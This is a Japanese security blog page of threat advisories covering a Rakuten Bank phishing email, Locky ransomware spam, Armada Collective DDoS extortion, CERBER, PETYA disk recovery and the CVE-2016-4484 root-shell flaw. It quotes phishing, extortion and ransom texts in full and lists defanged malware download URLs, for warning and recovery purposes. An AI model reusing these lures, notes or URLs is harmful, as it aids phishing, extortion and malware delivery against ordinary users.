セキュリティ事件、サイバー攻撃

脅威情報

楽天銀行を騙った PhishWall プレミアムのインストールを促す不審なメール

楽天銀行を騙った PhishWallプレミアムのインストールを促す不審メール

「【重要】不正送金・フィッシング対策ソフト「PhishWallプレミアム」提供開始について」という件名で、楽天銀行をかたる不審なメールが確認されています。本文中の「もっと詳しくの情報はこちら」のリンクをクリックするとバンキングマルウェア(Urlsnif・DreamBot)がダウンロードされます。

phishwall

送信者

楽天銀行 myinfo@rakuten.co.jp

件名

【重要】不正送金・フィッシング対策ソフト「PhishWallプレミアム」提供開始について

本文

尊敬するお客様へ

いつ楽天銀行をご利用いただき誠にありがとうございます。

楽天銀行では平成11月29日(水)より当行のホームページや「道銀ダイレクトサービス」をより安心してご利用いただけるよう、不正送金・フィッシング対策ソフト「PhishWallプレミアム」の提供を開始しました。

無料でご利用いただけるサービスですので、是非インストールしてご利用くださいますようお願い申し上げます。

なお、既に他社サイト等で「PhishWallプレミアム」をインストールされている場合は、あらためてインストールする必要はございません。

もっと詳しくの情報はこちら(hxxp://hu。digitaltraceforensics。com)

◆本メールのアドレスは送信専用となっております。

返信メールでのお問い合わせは承りかねますので、あらかじめご了承願います。

PhishWall 開発元のセキュアブレイン(SecureBrain)からの注意喚起

関連リンク

ランサムウェア Locky を添付した不審メール(Scanned from Lexmark)

ランサムウェア Locky を添付した不審メール(Scanned from Lexmark)

スポンサーリンク

受信日時

  • Thu, 09 Nov 2017 18:49:07 +0530

件名

  • Scanned from Lexmark

差出人

  • copier@nifty.com

本文

なし

本文(日本語訳)

なし

添付ファイル

  • image2017-11-09-832017.doc

添付ファイルの分析

  • 添付ファイルを開くと VBScript が実行され、ランサムウェアLocky をダウンロード実行する。これにより、PC内のファイルが暗号化されてしまう。
  • VirusTotal https://www.virustotal.com/ja/file/bf2ef3c514cbea1e55d6829746550968b192e067d882a2ba2afabf0b79d968c5/analysis/
    • HEUR:Trojan.WinLNK.Agent.gen (Kaspersky
    • RDN/Autorun.worm.gen (McAfee)
    • TrojanDownloader:O97M/Powdow.F (Microsoft)
    • W97M.Downloader (Symantec)
    • TROJ_POWLOAD.AUSJSL (Trendmicro)
    • VBScript
    • hxxp://67199419/hjkdfhJH73td
      hxxp://purenergyit/hjkdfhJH73td
      hxxp://phonecenter24de/hjkdfhJH73td
      hxxp://procuradores-elchecom/hjkdfhJH73td
      hxxp://tciseventhworldcom/hjkdfhJH73td
      hxxp://wayfarerbestcom/309

    2017/11/11 出会い系を装ったSPAMメール

    2017/11/11 出会い系を装ったSPAMメール

    スポンサーリンク

    受信日時

    • Fri, 10 Nov 2017 20:05:40 +0200

    件名

    • hi

    差出人

    • "Anna" <Annaqpul@buffetdossonhos.com.br>

    本文

    Hello, my dear!
    I want to say to you that I am thinking about you every day, every night, every minute!
    I am still waiting for your letter. My email anetah8uge@rambler.ru

    本文(日本語訳)

    こんにちは、親愛なるあなたへ! 

    私は毎日、毎晩、毎分あなたのことを考えていています!  まだ私はあなたの手紙を待っています。私の電子メールアドレスは、anetah8uge@rambler.ru です。

    添付ファイル

       
    • なし

    Armada Collective を名乗る攻撃者からの DDoS 攻撃による脅迫(RANSOM DDoS)

    FX事業者や仮想通貨取引所、証券会社などの金融機関を狙った DDoS 攻撃による脅迫(RANSOM DDoS)が多発しています。 被害にあった企業には Armada Collective を名乗る攻撃グループから DDoS攻撃の停止と引き換えにビットコインでの金銭の支払いを要求する脅迫メールが送られているようです。

    脅迫メールの例

    FORWARD THIS MAIL TO WHOEVER IS IMPORTANT IN YOUR COMPANY AND CAN MAKE DECISION!

    We are Armada Collective.
    hxxp:// Imgtfy.com/?q=Armada+Collective

    Most importantly, we have launched largest DDoS in Swiss history and one of the largest DDoS attacks ever. Search for "ProtonMail DDoS"

    All your servers will be DDoS-ed starging Monay (XXX XX) if you don't apy protection fee - exactly 10.08 Bitcoin @ XXXXXXXXXXXXXXXXXXXXXXXXXX

    If you don't pay by Monday, attack will start, yours service going down permanently price to stop will increase to 20 BTC and will go up 10 BTC for every day of attack.

    This is not a joke.
    Our attacks are extremely powerful - peak over 1 Tbps second.

    Do not reply, we will not read. Pay and we will know its you. AND YOU WILL NEVER AGAIN HEAR FROM US!
    Bitcoin is anonymous, nobody will ever know you cooperated.

    被害情報

    日時 被害企業 業種 アナウンスなど
    09/14 09:10 マネーパートナーズ FX
    09/15 7時頃 DMM.com証券 FX
    09/15 9時頃 Zaif 仮想通貨
    09/16 09:53 FXトレード・フィナンシャル FX
    09/18 08:XX みんなのビットコイン 仮想通貨
    09/18 10:15-1128頃 ヒロセ通商 FX

    本日10時15分頃より、当社サイトに対するサイバー攻撃(DDOS攻撃)があり、取引ツールへのログイン、当社ホームページへアクセスし難い状況になっておりました。
    11時28分頃に復旧し、取引ツールへのログイン、ホームページへのアクセスは可能となっております。

    http://hirose-fx.co.jp/index.php?aid=Mt_MtView&page=108140&pageIndex=0

    09/18 10:15-11:28頃

    JFX

    FX

    本日10時15分頃より、サイバー攻撃(DDOS攻撃)があり、取引ツールへのログイン、 当社ホームページへアクセスしずらい状況になっておりました。 11時28分頃に復旧し、取引ツールへのログイン、ホームページへのアクセスは可能と なっております。

    http://www.jfx.co.jp/

    09/20 17:44頃-

    ビットフライヤー

    仮想通貨

    【仮想通貨】国内取引所ビットフライヤーが突然繋がらなくなる障害が発生 → ネット民激怒!!http://coinmatomesokuho.blog.jp/archives/3920946.html

    09/20 04:00-22:00

    デューカスコピー・ジャパン

    FX

    9月20日以降に発生したサイバー攻撃について https://www.dukascopy.jp/home/

    • 日本時間2017年9月21日4時00分から5時44分までの間
    • 日本時間2017年9月21日18時15分から18時30分までの間
    • 日本時間2017年9月21日18時50分から18時59分までの間
    • 日本時間2017年9月21日21時08分から26時45分までの間
    • 日本時間2017年9月22日21時50分から22時00分までの間

    09/21 10:00復旧

    東洋証券

    証券

    ネット入金サービス障害【復旧】のお知らせ http://www.toyo-sec.co.jp/news/2017/hometrade/170921_3075.html

    09/21 8時頃- コムテックス FX
    09/21 09:15 外為ドットコム FX
    09/21 10:15 上田ハーロー FX
    09/21 18時頃 BTCボックス 仮想通貨
    09/22 10:06 マネースクウェア・ジャパン FX
    09/22 18:20-19:00頃 セントラル短期FX FX https://www.central-tanshifx.com/newsrelease/2017/0922-03.html

    関連情報リンク

    関係者によると、「Armada Collective」と名乗る差出人からメールが送り付けられた。期日を定めた上で、約300万円相当のビットコインを支払わなければ、全てのネットワークにDDoS攻撃を始めるなどと脅迫する内容だった

    Voice Message を装った Locky ランサムウェア添付スパムメール

    Voice Message を装った Locky ランサム添付スパムメール

    概要

    2017年9月25日、ボイスメッセージを装ったランサムウェアが添付されたスパムメールを受信しました。電話番号020XXXXXXXから XX秒のメッセージを預かっています」といった内容で、Voice Message(電話番号).7z のファイルが添付されています。この添付ファイルは、Locky と呼ばれるマルウェア亜種をダウンロード実行するスクリプトが入っており、実行するとPC内のファイルが勝手に暗号化されてしまいます。

    スポンサーリンク

    受信日時

    • 2017年9月25日 18:38 +07:00

    件名

    • Message from XXXXXXXXXXX (電話番号)

    差出人

    本文

    25/09/25/2017,18:38:XX PM

    36,1-second message deposited by 020XXXXXXXX

    添付ファイル

    • Voice Message(020XXXXXXXX).7z
      • MD5: C4A98D60411C7A84AA8E84B656008BB5
      • SHA1: E36777E044CADC9B011A4EEDC451C8CDA54D1AC1
    • Voice Message(020XXXXXXX).vbs
      • MD5: E5AFD128F49E0C11F7D4190CAD5D66A0
      • SHA1:B5FBC44EA70DF1716BF1B0C49C6326EA160ABBB6

    音声で脅迫するファイル暗号化ランサムウェア CERBER の対処方法

    音声で脅迫するファイル暗号化ランサムウェア CERBER の対処方法

    キーワード: Ransomware, ランサムウェア, 復号, 解除, 暗号化, 解除ツール, 復号ツール, Decryptor 

     

    このエントリーをはてなブックマークに追加

    1. CERBER 概要

    スポンサーリンク

    ランサムウェア(ransomware)とは、感染するとハードディスク内のファイルを勝手に暗号化して脅迫し、復号・解除キーと引き換えに金銭を要求するマルウェア(ウイルス)です。ランサムウェアには、CryptoLocker や TeslaCrypt、 Locky など多くの種類があります。これらのランサムウェアは、暗号化すると脅迫文を表示して金銭を要求するものでしたが、CERBER と呼ばれるマルウェアは音声で脅迫します。また、身代金の支払い期限が設定されており、期限が過ぎると身代金の金額を吊り上げ、支払いを迫ります。

    ランサムウェア CERBER は、メール添付ファイル経由より、改ざんされたウェブサイトや広告にアクセスすることで感染するケースが多いようです。改ざんされウェブページにアクセスすると、ウェブブラウザのプラグインである Flash Player や Java などの脆弱性を攻撃するエクスプロイトキット (Magnitude Exploit Kit や Rig Exploit Kit など) を設置したサイトにリダイレクトされ、攻撃が成功すると Cerber がダウンロード実行されて感染します。

    CERBER は、何度かバージョンアップされており、2016年11月末にはデータベースファイルを暗号化する機能を追加したバージョン 4.x が確認されています。トレンドマイクロの調査によると、CERBER 4.0 で暗号化対象となるデータベースファイルとしては、Microsoft Access、SQL Server, MySQL, Oracle、MySQL のほか、会計ソフト、給与計算ソフト、医療管理データベースソフトウェアに関連するファイルも含まれています。

    2. CERBER による暗号化と脅迫文

    CERBER に感染後のデスクトップ画面

    他のランサムウェア(ransomware)と同じく、感染後にディスクトップの壁紙が脅迫文に変更されます。

    cerber4

    CERBER の脅迫文

    脅迫文は多数の言語に対応しており、日本語に対応しています。ファイル形式は、HTML ではんく HTA 形式となっています。

    cerber0

    3. CEBER で暗号化されたファイルの復号方法(1回のみ)

    CERBER の脅迫文に記載されているパーソナルページで、無料で 1つファイルの復号を試すことができます。

    ※ 購入を推奨している訳ではありません。

    Tor ブラウザで脅迫文に記載されているパーソナルページにアクセスすると、言語を選択する画面が表示されます。日本語、中国語、ロシア語など多くの言語に対応しているようです。

    cerber1

    ロボットアクセス回避のためのキャプチャ認証が入っていました。

    セキュリティ上の理由のため、以下でロボットではなく、ヒトであることを確認してください。

    cerber2

    メニュー画面が表示されます。支払い期限の時間などが表示されています。このページの上部に「1つのファイルを無料で復号化」というメニューがあります。

    ドキュメント、写真、データベース、その他の重要なファイルは暗号化されています!

    ファイルを復号するには、特別なソフトウェア - <<Cerber Decryptor>> をご購入いただく必要があります。
    すべての取引は bitcoin ネットワーク内でのみ実行されます。
    これから5日間だけ、B1.000の特別価格でこの製品をお求めいただけます。
    5日経過後は、この製品の価格はB2.000になります。

    スポンサーリンク

    cerber3

    上記メニューから「1つのファイルを無料で復号化」にアクセスすると、無料で1つのファイルを復号できる特別な機会!」と書かれたページが表示されます。「ファイルをアップロード」のボタンを押して、復号したいファイルを選びます。復号できるファイルは、サイズが2048バイトまでになっています。

    今なら、無料で1つのファイルを復号化できる特別な機会!
    サービスが本当に役に立つかどうかを確認後、<<Cerber Decryptor>> プログラムにお払い頂いた後で、1つのファイルを復号化することができます

    cerber6

    復号が成功すると「復号化されたファイルのダウンロード」というボタンが表示されるので、クリックしてダウンロードします。

    cerber8

    ダウンロードされるファイル名は Decrypted.zip となっており、解凍・展開すると復号されたファイルが確認できました。

    cerber10

    4. CERBER で暗号化されたファイルの復号方法

    スポンサーリンク

    初期の CERBER バージョン1 については、トレンドマイクロからファイルの暗号化を解除するツール( Ransomware File Decryptor )が提供されています。

    5. 関連URL

    LinuxディストリビューションにEnterキーを押し続けるだけで root シェルを開くことが出来る深刻な脆弱性(Cryptsetup Initrd root Shell CVE-2016-4484)

    LinuxディストリビューションにEnterキーを押し続けるだけで root シェルを開くことができる深刻な脆弱性(Cryptsetup Initrd root Shell CVE-2016-4484)

           

    キーワード: Linux, Ubuntu, RedHat, LUKS, cryptsetup,  initramfs(initial RAM file system), ハードディスク暗号化,

    1. Cryptsetup Initrd root Shell (CVE-2016-4484) の概要

    スポンサーリンク

    Linuxディストリビューションで使われているハードディスク暗号化のための標準的な使用である LUKS (Linux Unified Key Setup on disk format) に深刻な脆弱性(Cryptsetup Initrd root Shell CVE-2016-4484)が見つかった。この脆弱性は、LUKSのユーティリティである cryptsetup に存在するもので、システムを起動時の認証画面で Enter キーを押し続けるだけで簡単に悪用することができる。この脆弱性を悪用するとコンソールから root シェルが起動し、ハードディスクのコピーや破壊活動、ネットワークを設定して通信などが可能となり、悪用された場合の影響は大きい。暗号化されたハードディスクの内容にはアクセスできないことはない。

    影響を受けるディストリビューションには、「Red Hat Enterpise Linux」(RHEL)、「Fedora」、「Ubuntu」、「Debian」、「SLES」などが含まれる。 

    物理的に直接アクセスできる図書館や空港、学校などに設置された端末、ATMなどは攻撃を受ける可能性が高い。その他、リモートでコンソール画面にアクセスできるクラウドサービスなども影響を受ける可能性がある。

    スポンサーリンク

    2. Cryptsetup Initrd root Shell (CVE-2016-4484)の脆弱性検証

           

    (1) Ubuntu を起動すると認証画面が表示される 

    ubuntu1

           

    (2) 「Enter」を押して認証失敗する 

    ubuntu2

           

    (3)  「Enter」を押し続けて、何度か認証失敗 

    ubuntu3

           

    (4) initramfs(initial RAM file system)が起動

            Build-in Command として、mount や dd、ifconfig、wget など多くのコマンドが利用可能 

    ubuntu4

    スポンサーリンク

    3. 対策

    各ディストリビューションの情報を確認して、アップデートしてください。

    4. 関連URL

    PETYA ウイルス - MBRを書き換えてPCを起動不能にするランサムウェア

    PETYA ウイルス - MBRを書き換えてPCを起動不能にするランサムウェア

     

    スポンサーリンク

     

    キーワード: PETYA、ウイルス、マルウェア、ランサムウェア、復元、復号、復旧、decrypt、MBR、MFT、ransomware, Virus

    このエントリーをはてなブックマークに追加

     

    目次

     
       

    1. PETYA ウイルスとは

       

    2. PETYA ウイルス感染時の画面

       

    3. 書き換えられたMBR、MFTなど

       

    4. ファイルの復旧について

       

    5. 暗号化されたディスクの復号方法

     

    1. PETYAウイルスとは

     

    PETYAウイルスは、感染するとMBRMFT(マスターファイルテーブル)を上書きしてPCを起動不能するランサムウェアの一種です。PETYAウイルスを実行すると、Windowsが急に落ちて、システム再起動が発生します。PCを起動するとドクロマークの絵を表示した後、ハードディスクを軍事レベルのアルゴリズムで暗号化した、復号するための鍵を購入するために手続きをするように要求する文書を表示します。要求額は約0.9 BITCOINになっていました。

     

    PETYA ウイルスに感染させてハードディスクの内部を確認したところ、ハードディスク全体が暗号化されている訳ではなく、MBRとMFTが部分的に書き換えられているだけのようでした。ファイルのデータは暗号化されずに残っているようです。また、軍事的なレベルのアルゴリズムで暗号化と書いてありましたが、MFTの書き換えはXOR処理のように見えます。

     

    PETYAウイルスのプログラムコードを解析した訳ではなく、ハードディスクの一部を調査しただけなので正確ではないかもしれませんが、ハードディスク内のファイルデータは残っているようです。しかし、MFTが書き換えられているので、ファイル名やデータが格納されている位置(クラスタ番号)などがわからないので、ちゃんと復旧するのは大変そうです。foremost などのデータカービングソフトを使えば、ヘッダ・フッダが規定されているものについては、ある程度自動で復元できそうです。MFTレコード内に直接データが保存される小さなサイズのファイルに関しては、データが書き換えられてしまっていると思います。

     

    NTFS 以外のファイルシステムの場合どうなるのかは調べられていません。

     

     

    2. PETYA ウイルスに感染時の画面

     

    スポンサーリンク

     

    ① PETYAウイルスを実行すると、強制的に Windows が落ちてシステム再起動がかかります。

     

    petya_ico

     

    ②PCが立ち上がると、リカバリのための CHKDSKを実行しているような画面が出てきます。

     

    PETAYA-1

     

    ③ ②が終わると、赤白点滅させながらドクロマークの絵を表示します。

     

    PETYA-2PETYA-3

     

    ④ ハードディスクを暗号化したこと、復号するための鍵の購入方法が表示されます。

     

    PETYA-4

     
       

    You became victime of the PETYA RANSOMWARE!

       

    The harddisks of your computer have been encrypted with an millitary grade encryption algorithm. There is no way to restore your data without a special key. You can purchase this key on the darknet page shown in step 2.

       

    To purchase your key and restore your data, please follow these three easy steps:

       

    1. Download the Tor Browser at “https://www.torproject.org/”. If you need help, please google for “access onion page”.

       

    2. Visit one of the following pages with the Tor Browser:

       

       http://petyaXXXXXXXX

       

       http://petayaXXXXXXX

       

    3. Enter your personal decryption code there:

       

       XXXXXX-XXXXXX-XXXXXX-XXXXXX-XXXXXX…

       

    If you already purchased your key, please enter it below.

     

     

    3. 書き換えられたMBR、MFTなど

     

    スポンサーリンク

     

     

    暗号化されたファイルの復旧する 3 つの方法を紹介します。

     

    ①第0ブロック MBRの書き換え

     

    mbr

     

    左が正常なMBR、右がPETYAに書き換えられたMBRです。オフセット 446バイト以降のパーティションテーブルは書き換えられていませんが、前半のブートストラップローダー部分が書き換えられていることがわかります。

     

     

     

    ②第1ブロックから第33ブロック目の書き換え

     

    block1-33

     

    第0ブロック目のMBR以降、第1ブロックから第33ブロック目は通常 0x00 になっていますが、PETYAウイルスによって 0x07 で XOR されているように見えます。XORとは限りませんが。

     

     

     

    ③ 第34ブロック目~第49ブロックまでの書き換え

     

    推測ですがPETYAウイルスに感染後に表示されるドクロマークや案内を表示すると思われるプログラムが入っていました。

     

     

     

    ④ 第50ブロック目以降から第1パーティション直前まで

     

    特に書き換えはないようです。

     

     

     

    MFT(マスターファイルテーブル)の書き換え

     

    MFT-Mirror

     

    左が正常なMFTレコードの一部(MFTMirrのレコード)です。右はPETYAウイルスで書き換えられたMFTレコードになります。正常時の0x0の部分からキーを推測して XOR すると一部は戻せました。途中でパターンが変わるので、そのパターンをプログラム解析で確認できれば復号できそうです。

     

    時間があればもう少し詳しく調べてみたいと思います。

     

     

     

    4. ファイルの復旧について

     

    MBR、MFTは書き換えられていますが、ファイルデータはそのまま残っているようなので、試しにファイルが取り出せるか確認してみました。

     

    感染前の C:\Windows\notepad.exe が クラスタ番号 169258 から 44 クラスタ分あることが分かっていたので、感染後のハードディスクから該当部分を dd コマンドで取り出してみました。

     
       

    # dd if=infected-disk.dd skip=`expr 169258 * 8 + 2048` count=`expr 44 * 8` > notepad.dd

     

    notepad.exe は 179,712バイトなので、末尾の余計な部分をバイナリエディタで削って、MD5ハッシュ値を確認します。

     
       

    # md5sum notepad.dd      
    d378bffb70923139d6a4f546864aa61c  notepad.dd

     

    感染前の C:\Windows\notepad.exe の MD5 のハッシュ値である  d378bffb70923139d6a4f546864aa61c と一致しました。少なくともこの部分のファイルデータは書き換えられてないようです。

     

     

    5. 暗号化されたディスクの復号方法

     

    暗号化されたディスクを復号するための解除キーを解析してくれるサイト(PETYA-PAY-NO-RANSOM)が公開されています。

     

    Petya Ransomware's Encryption Defeated and Password Generator Released http://www.bleepingcomputer.com/news/security/petya-ransomwares-encryption-defeated-and-password-generator-released/

     

    PETYA-PAY-NO-RANSOM(https://petya-pay-no-ransom-mirror1.herokuapp.com/)

     

    上記の PETYA-PAY-NO-RANSOM を利用した PETYA RANSOM の解除を試してみました。暗号化は解除でき、正常にWindowsを起動することが確認できました。試してみた手順を紹介します。

     

    PETYA-PAY-NO-RANSOM に下記①②の情報を貼り付けて「Submit」ボタンを押すと、解除キーが表示されます。このキーをPETYA RANSOMWARE のキー入力画面に、入力すると暗号化が解除されて正常にWindowsを起動することができます。

     
       

    ① 暗号化されたハードディスクのセクタ55 のデータをBASE64エンコードした情報

       

    ② 暗号化されたハードディスクのセクタ54 のオフセット 33 から 8バイト分のデータをBASE64エンコードした情報

     

    上記①②の情報を取得するためのツール Petya Sector Extractor が下記URLで提供さてれています。  Windows 上で動作するGUI プログラムです。

     

    http://download.bleepingcomputer.com/fabian-wosar/PetyaExtractor.zip

     

    今回は、別途 Windows マシンにHDDをつなぎかえるのが面倒だったため、上記 Petaya Sector Extractor は使わずに、Bootable Linux CD でブートして dd コマンドと Base64 コマンドで取得する方法にしました。

     

     

    (1) Bootable Linux CD で PETYA RANSOMWARE に感染したマシンを起動します

     

    Bootable Linux なら何でも良いのですが、今回は Deft Linux を使いました。

     

     

    (2) Linux が起動したら下記のコマンドを実行して①②の情報を取得します

     

    感染したマシンのハードディスクが、デバイス名 /dev/sda として認識されています。この /dev/sda から該当データを取得することになります。下記、具体的なコマンドになります。

     

    ①の暗号化されたハードディスクのセクタ55 のデータをBASE64エンコードした情報を取得

     
       

    deft ~ % dd if=/dev/sda bs=512 skip=55 count=1 2>/dev/null | base64      
    /cc3NxMWNzenSDc3rzs3N+37Nzfq/zc3baU3NyfGNzc3BTc3N8g3N1RtNzdJoTc3K6M3N6tgNzft      
    1zc33P03N/7HNzeTFjc3p7Q3N6/9NzftvDc37P83N+3lNzcn2Dc3NTU3N7c3NzdUbTc3SaI3N6um       
    NzerZDc3bSg3N9z9Nzf9xzc3E1Y3N6cMNzcvfTc37fw3N+r/NzdtZTc3J8Q3NzMHNzc3iDc3Um03       
    N8miNzerIzc3q343N+36Nzff/Tc3/cc3N5NVNzenoDc3r7s3N+07Nzfq/zc3bSU3NyfGNzcxMTc3       
    N/c3N1JtNzdJIjc3K6M3N6tkNzdtqDc33/03N/7HNzcT1Tc3pxQ3N687Nzdtujc37P83N+0lNzcn       
    2Dc3PzU3N7cINzdTbTc3yWI3N6ulNzerfDc37Tk3N9/9Nzf8xzc3ExY3N6cONzevfDc3bTs3N+r/       
    NzdtZTc3J8I3Nz0HNzc3CDc3VW03N0nhNzcrpTc3q2A3N226Nzfe/Tc3/cc3N5NWNzenADc3L/03       
    N+38Nzfq/zc3bWU3NyfENzc7PTc3N0g3N1NtNzdJojc3qyM3N6t+Nzdt+Tc33/03N/vHNzeTFjc3       
    pww3N688NzftOzc36v83N20lNzcnwjc3OT03NzfINzdSbTc3SeE3NyulNzerYDc3bbo3N979Nzc=

     

    ②の暗号化されたハードディスクのセクタ54 のオフセット 33 から 8バイト分のデータをBASE64エンコードした情報を取得

     
       

    deft ~ % dd if=/dev/sda bs=1 skip=`expr 33 \+ 512 \* 54` count=8 2>/dev/null | base64      
    LSgLXoh++aQ=

     

    上記コマンド結果を USB メモリや SSH などのネットワーク経由で取得し保存しておきます。

     

     

    (3) (2) で得た情報を「PETYA-PAY-NO-RANSOM(https://petya-pay-no-ransom-mirror1.herokuapp.com/)」のフォームに貼り付けて Submit します

     

    decrypt1

     

    しばらくすると解除キーが表示されます。ここでは Your key is: の行にある「XxNxRx3xExTxTxsx」が解除キーになります。

     

    decrypt2

     

     

    (4) (3)で表示された解除キーを PETYA の画面に入力します

     

    decrypt4

     

    解除キーを入力すると、復号処理が実行されます。

     

    decrypt5

     

    しばらくすると復号処理が完了すると、マシン再起動の表示が出ます。

     

    decrypt6

     

    再起動すると正常にWindowsが起動します。

     

     

     

    スポンサーリンク

    Locky Virus - 日本語で身代金要求するランサムウェアウイルスの対処方法

    更新日:
    2016-03-29 「感染しないための対策」を追記
    2016-03-27 「感染時の動作」、「Locky Decrytor の購入画面」をを追記

    Locky Virus - 日本語で身代金を要求するランサムウェアウイルスの対処方法

    キーワード: ウイルス、Locky、マルウェア、ランサムウェア、復元、復号、復旧、decrypt, js、javascript、Document2、ransomware, virus, thor, osiris, zzzzz, aesir

    このエントリーをはてなブックマークに追加 

    目次

    1. Locky ウイルスとは

    2. 脅迫文

    3. 暗号化されたファイルの復旧方法

    4. メール添付ファイルの例

    5. Locky ウイルスのダウロードURL

    6. Locky ウイルス感染時の動作

    7. 感染しないための対策

    8. 関連リンク

    スポンサーリンク

    1. Locky ウイルスとは

    Locky ウイルスは、感染するとPC内のファイル(テキストやオフィスファイル、画像、動画ファイルなど)を勝手に暗号化してしまうランサムウェアと言われる種類のウイルスです。暗号化されたファイルは、拡張子が「Locky」 となってしまうことから通称「Locky」と呼ばれています。今までのランサムウェアの脅迫文は日本語対応していないものがほとんどでしたが、Locky は日本語環境であれば日本語の脅迫文を作成して表示します。

    感染経路としては、メール添付ファイルと脆弱性を攻撃するWebサイトの大きく2つがあります。メール添付ファイルでの感染は、実行すると Locky ウイルスをダウンロードして実行する JavaScriptファイルが含まれた ZIP ファイルが添付されているケースが多いです。その他 rar 拡張子の添付ファイルのケースもあります。また、改ざんされたWebサイトでの感染では、そのWebサイトを見ると Adobe Flash などの脆弱性を攻撃して自動的に Locky Virus をダウンロードして実行する手法(ドライブバイダウンロード)による感染が多く報告されています。このWebサイト経由での感染は、Adobe Flash や IE などのソフトウェアを最新にしておけば感染することはほどんどありません。ランサムウェアなどのウイルスに感染しないように、必ずソフトウェアはアップデートして最新のバージョンにしておきましょう。

    1.2. Locky 亜種

    Locky ウイルスが出現して間もなく亜種が出回りはじめました。Locky亜種は、初期のLocky と比べて、ダウンロードされるウイルス本体の実行ファイル形式(EXEからDLL形式)や暗号化後のファイル名の形式、拡張子名(.thor.aesir.zzzzz.osirisなどが変わっています。目的はかわらず、感染PC内のファイルを暗号化して人質にして、身代金(ビットコイン支払い)を要求することです。

    Locky亜種は、主にメールの添付ファイルとして送られてきます。添付されるファイルの形式は、以下が確認されています。

    添付ファイルの形式 ファイルの拡張子
    zip zip
    The Witcher 2 Game Archive dzip
    Microsoft Office doc, docx, docm
      xls, xlsx

    zip, dzip などの圧縮ファイルは、展開すると js, wsf, vbs などのスクリプトファイルが入っており、実行してしまうと Locky 亜種の本体であるDLLプログラムをダウンロードして実行します。

    doc, docm などのMicrosoft Office のオフィスファイルには、開くと Locky亜種をダウンロードするマクロが入っています。

    2. 脅迫文

    Locky ウイルスに感染すると表示される日本語の脅迫文です。
    • _Locky_recover_instructions.bmp

    _Locky_recover_instructions

    • _Locky_recover_instructions.txt

    !!! 重要な情報 !!!!

    すべてのファイルは、RSA-2048およびAES-128暗号で暗号化されています。  
    RSAの詳細については、ここで見つけることができます:  
    http://ja.wikipedia.org/wiki/RSA暗号  
    hxxp://ja.wikipedia.org/wiki/Advanced_Encryption_Standard

    あなたのファイルの復号化は秘密鍵でのみ可能であり、私たちの秘密のサーバー上にあるプログラムを、復号化します。  
    あなたの秘密鍵を受信するには、リンクのいずれかに従います:  
    1. hxxp://i3ezlvkoi7fwyood.tor2web.org/AAF92AC11ABCDEF  
    2. hxxp://i3ezlvkoi7fwyood.onion.to/AAF92AC11ABCDEF  
    3. hxxp://i3ezlvkoi7fwyood.onion.cab/AAF92AC11ABCDEF

    このすべてのアドレスが使用できない場合は、次の手順を実行します。  
    1. ダウンロードして、Torのブラウザをインストールします: hxxps://www.torproject.org/download/download-easy.html  
    2. インストールが正常に完了したら、ブラウザを実行し、初期化を待ちます。  
    3. アドレスバーにタイプ: i3ezlvkoi7fwyood.onion/AAF92AC11ABCDEF  
    4. サイトの指示に従ってください。

    !!! 個人識別ID: AAF92AC11ABCDEF !!!

    • Locky Decryptor 購入画面

    暗号化されたファイルを復元するためのソフトウェアである Locky Decryptor の要求額は 1.0 Bitcoin のようです。日本円に換算すると5万円弱くらいでしょうか。暗号化されたファイルの重要性によっては、払ってしまいそうな金額です。

    脅迫文と同じく、英語、日本語のほか、韓国語、ドイツ語、フランス語、イタリア語など多くの言語をサポートしています。

    身代金を払うことは、犯罪者にお金を払ってしまうことになってしまいますし、犯罪を助長することになってしまうのでお勧めしませんが、バックアップなどから復旧できない大切なデータが被害にあった場合は、身代金を払って復号するしか手はなさそうです。

    LockyDecryptor 

    3. 暗号化されたファイルの復旧方法

    スポンサーリンク

    暗号化されたファイルの復旧する 3 つの方法を紹介します。

    (1) バックアップから復旧

    バックアップから復旧することが一番簡単な方法です。ランサムウェアの被害に限らず、インシデントが発生するとバックアップの大切さがわかります。

    (2) ボリュームシャドーコピーからの復旧

    Vista/7 以降のWindowsは、標準でファイルの自動バックアップサービスが動いています。ファイルのプロパティのタブで「以前のバージョン」で表示されるものがバックアップされたファイルになります。

    いつの時点のボリュームシャドーコピーがあるかなどを確認する方法です。管理者権限のコマンドプロンプトで、vssadmin か wmic コマンドを実行すると表示されます。その他、エクスプローラのフォルダやファイルのプロパティから「以前のバージョン」タブを確認する方法もあります。

    > vssadmin list shadows

    > wmic.exe shadowcopys

    ボリュームシャドーコピーが残っていれば、Shadow Explorer というソフトウェア(http://www.shadowexplorer.com/)を使うことで以前のバージョンのファイルを復元することができます。

    Locky ウイルスは、感染時にボリュームシャドーコピーを削除するコマンドを実行します。このコマンドには管理者権限が必要なので、一般ユーザ権限で操作をしていたのであれば削除されずに残っている可能性があります。

    (3) アンチウイルスベンダーの復号ツールを使う(未確認)

    本当に復号できるのか確認検証できていませんが、下記URL に Locky ウイルスに暗号化されたファイルを復元する方法が記載されています。

    How to Decrypt Files Affected by Locky

    http://www.im-infected.com/virus/remove-locky-ransomware-virus-removal.html

    DrWeb の FTP サイトに復号ツール(ftp://ftp.drweb.com/pub/drweb/tools/te94decrypt.exe)があるようですが、認証が必要でダウンロードできませんでした。DrWeb を購入しているユーザのみに公開されているのかもしれません?。DrWeb のライセンスを持っていないので詳細は不明です。

    このツールを使って下記コマンドを実行することにより復号できるようです。(確認できていないので、本当に復元できるか不明です)

    te94decrypt.exe -k 85

    上記コマンドで復号できない場合は、-k オプションの値を -k 87, -k 88, -k 90, -k 106, or –k186 のように変えて試すとよいようです。

    (4) 身代金を支払う

    最後の手段ですね。

    スポンサーリンク

    4. メール添付ファイルの例

    Locky ウイルスをダウンロードする JavaScript ファイル (ZIP 圧縮ファイル)を添付したメールの一例です。以下、Locky ウイルスに関するメールの特徴です。

    • 件名は Document 2 が多い
    • 差出人と宛先が自分のメールアドレス
    • 本文はなしが多い
    • 添付ファイルは zip で Locky Virus をダウンロードする js ファイルが含まれている

     

    4.1 メール添付ファイルの例

    • Scanned images

    件名 Scanned image
    差出人 "admin" lands804@nifty.com
    日時 Fri, 11 Mar 2016 21:28:25 +0530 (IST India Standard Time)
    X-Mailer Internet FAX, MGCS
    本文 Image data in PDF format has been attached to this email.
    添付ファイル 11-03-2016-0424109259.zip (LUH5654603905.js)

    • Document 2

    件名 Document 2
    差出人 自分のメールアドレス
    日時 Fri, 18 Mar 2016 07:36:24 –0500 (EST アメリカ東部)
    X-Mailer なし
    本文 なし
    添付ファイル Document 2.zip (中身は SKS6515937204.js)

    • Message from KFBT_C125

    件名 Message from KFBT_C125
    差出人 copier@nifty.com
